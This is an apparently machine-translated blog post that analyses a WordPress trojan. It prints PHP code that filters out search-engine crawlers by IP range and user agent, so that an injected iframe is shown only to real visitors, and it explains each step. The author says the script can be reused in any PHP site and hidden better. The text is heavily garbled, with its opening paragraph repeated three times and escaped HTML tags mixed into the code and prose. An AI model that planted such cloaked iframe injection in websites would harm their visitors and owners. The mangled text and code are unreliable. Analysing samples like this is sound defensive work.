Sample Analysis of a Wordpress Trojan

After seeing zuola, I got a wordpress Trojan script. So I clicked the connection and simply looked at the sample. The principle is relatively simple. First, determine whether the access source is a search engine spider or bot, and then determine whether a problematic iframe-the effectiveness of the Trojan depends on the content in the iframe. This short PHP script can be used completely.

After seeing zuola, I got a wordpress Trojan script. So I clicked the connection and simply looked at the sample. The principle is relatively simple. First, determine whether the access source is a search engine spider or bot, and then determine whether a problematic iframe-the effectiveness of the Trojan depends on the content in the iframe. This short PHP script can be used completely.

After seeing zuola, I got a wordpress Trojan script. So I clicked the connection and simply looked at the sample. The principle is relatively simple. First, determine whether the access source is a search engine spider or bot, and then determine whether a problematic iframe-the effectiveness of the Trojan depends on the content in the iframe. This short PHP script can be used in any other PHP program.

The source code is simply organized as follows:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

Error_reporting (0 ); $ Bot = FALSE; $ User_agent_to_filter = array ('bot ', 'spider', 'splitder'... 'mybloglog api '); $ Stop_ips_masks = array ( Array ("216.239.32.0", "216.239.63.255 "), Array ("64.68.80.0", "64.68.87.255 "), ......... ......... Array ("72.30.0.0", "72.30.255.255 "), Array ("38.0.0.0", "38.255.255.255 ") ); $ My_ip2long = sprintf ("% u", ip2long ($ _ SERVER ['remote _ ADDR ']); Foreach ($ stop_ips_masks as $ IPs ){ $ First_d = sprintf ("% u", ip2long ($ IPs [0]); $ Second_d = sprintf ("% u", ip2long ($ IPs [1]); If ($ my_ip2long >=$ first_d & $ my_ip2long <= $ second_d ){ $ Bot = TRUE; Break; } } Foreach ($ user_agent_to_filter as $ bot_sign ){ If (strpos ($ _ SERVER ['HTTP _ USER_AGENT '], $ bot_sign )! = False ){ $ Bot = true; Break; } } If (! $ Bot ){ Echo'&lt;/Iframe &amp; gt "'&lt;/p&gt; &lt;p class =" line "&gt;}&lt;/p&gt; &lt;/pre&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/figure&gt; 1. Environment configuration and variable declaration &lt;p&gt; error_reporting (0) to ensure that no error is reported under any circumstances. &lt;/P&gt; &lt;p&gt; $ bot indicates a flag of sound. The default value is false. It indicates whether the current visitor is a real browser user. &lt;/P&gt; &lt;p&gt; $ user_agent_to_filter and $ stop_ips_masks. The former is one-dimensional data and stores a large amount of browser user_agent to be excluded. The latter is two-dimensional data, several ip segments are stored, which are queried by search engines. &lt;/P&gt; 2. Visitor ip judgment &lt;p&gt; next, the ip address and browser user agent are used to determine whether the user is a common browser. &lt;/P&gt; &lt;figure class = "highlight php"&gt; &lt;table&gt; &lt;tr&gt; &lt;td class = "gutter"&gt; &lt;pre&gt; &lt;p class = "line"&gt; 1 &lt;/p&gt; &lt;p class = "line"&gt; 2 &lt;/p&gt; &lt;p class = "line"&gt; 3 &lt;/p&gt; &lt;p class = "line"&gt; 4 &lt;/ p&gt; &lt;p class = "line"&gt; 5 &lt;/p&gt; &lt;p class = "line"&gt; 6 &lt;/p&gt; &lt;p class = "line"&gt; 7 &lt;/p&gt; &lt;p class = "line"&gt; 8 &lt;/p&gt; &lt;p class = "line"&gt; 9 &lt;/p&gt; &lt;p class = "line"&gt; 10 &lt;/p&gt; &lt;/pre&gt; &lt;/td&gt; &lt;td class = "code"&gt; &lt;pre&gt; &lt;p class = "line"&gt; $ my_ip2long = sprintf ("% u ", ip2long ($ _ SERVER ['remote _ ADDR ']); &lt;/p&gt; &lt;p clas S = "line"&gt; foreach ($ stop_ips_masks as $ IPs) {&lt;/p&gt; &lt;p class = "line"&gt; $ first_d = sprintf ("% u ", ip2long ($ IPs [0]); &lt;/p&gt; &lt;p class = "line"&gt; $ second_d = sprintf ("% u ", ip2long ($ IPs [1]); &lt;/p&gt; &lt;p class = "line"&gt; if ($ my_ip2long &gt;=$ first_d &amp; $ my_ip2long &lt;= $ second_d) {&lt;/p&gt; &lt;p class = "line"&gt; $ bot = TRUE; &lt;/p&gt; &lt;p class = "line"&gt; break; &lt;/p&gt; &lt;p class = "line" &gt;}&lt;/p&gt; &lt;p class = "line" &gt;}&lt;/p&gt; &lt;/pre&gt; &lt;/td&gt; &lt;/ tr&gt; &lt;/table&gt; &lt;/figure&gt; &lt;p&gt; ip2long The function can convert an IP address to an integer. sprintf ('% U', xxx) converts this int to an unsigned number. &lt;/P&gt; &lt;p&gt; foreach loops in $ stop_ips_masks to retrieve every array in two-dimensional data, $ frist_d and $ second_d respectively store the unsigned integer values of the starting ip address and ending ip address of the ip address segment, and then use the following if to determine whether the current visitor's ip address is within the range specified by $ stop_ips_masks, if yes, set $ bot to true. &lt;/P&gt; 3. Visitor user agent judgment &lt;figure class = "highlight php"&gt; &lt;table&gt; &lt;tr&gt; &lt;td class = "gutter"&gt; &lt;pre&gt; &lt;p class = "line"&gt; 1 &lt;/p&gt; &lt;p class = "line"&gt; 2 &lt;/p&gt; &lt;p class = "line"&gt; 3 &lt;/p&gt; &lt;p class = "line"&gt; 4 &lt;/p&gt; &lt;p class = "line"&gt; 5 &lt;/p&gt; &lt;p class = "line"&gt; 6 &lt;/p&gt; &lt;/pre&gt; &lt;/td&gt; &lt;td class = "code"&gt; &lt;pre&gt; &lt;p class = "line"&gt; foreach ($ user_agent_to_filter as $ bot_sign) {&lt;/p&gt; &lt;p class = "line"&gt; if (strpos ($ _ SERVER ['HTTP _ USER_AGENT '], $ bot_sign )! = False) {&lt;/p&gt; &lt;p class = "line"&gt; $ bot = true; &lt;/p&gt; &lt;p class = "line"&gt; break; &lt;/p&gt; &lt;p class = "line" &gt;}&lt;/p&gt; &lt;p class = "line" &gt;}&lt;/p&gt; &lt;/pre&gt; &lt;/td&gt; &lt;/ tr&gt; &lt;/table&gt; &lt;/figure&gt; &lt;p&gt; the judgment of this part is similar to that of ip, read each value from $ user_agent_to_filter and compare it with the user agent of the browser. If a robot or a spider is found, set $ bot to true. &lt;/P&gt; 4. Place iframe &lt;p&gt; if (! $ Bot) controls when a visitor is a common browser, that is, place the iframe. the scr of iframe is a shameless web page where the messy content is placed-chrome has already blocked it. &lt;/P&gt; 5. Conclusion &lt;p&gt; This script can be used on any website written in php. In addition, this code can be better hidden, rather than streaking without even underpants. &lt;/P&gt; &lt;p&gt; after seeing zuola, I got a wordpress Trojan script, and then clicked the connection and simply looked at the sample. The principle is relatively simple. First, determine whether the access source is a search engine spider or bot, and then determine whether a problematic iframe-the effectiveness of the Trojan depends on the content in the iframe. This short PHP script can be used in any other PHP program. &lt;/P&gt; &lt;p&gt; the source code is simply organized as follows: &lt;p class = "copyright"&gt; original address: Sample Analysis of a Wordpress Trojan, thanks to the original author for sharing.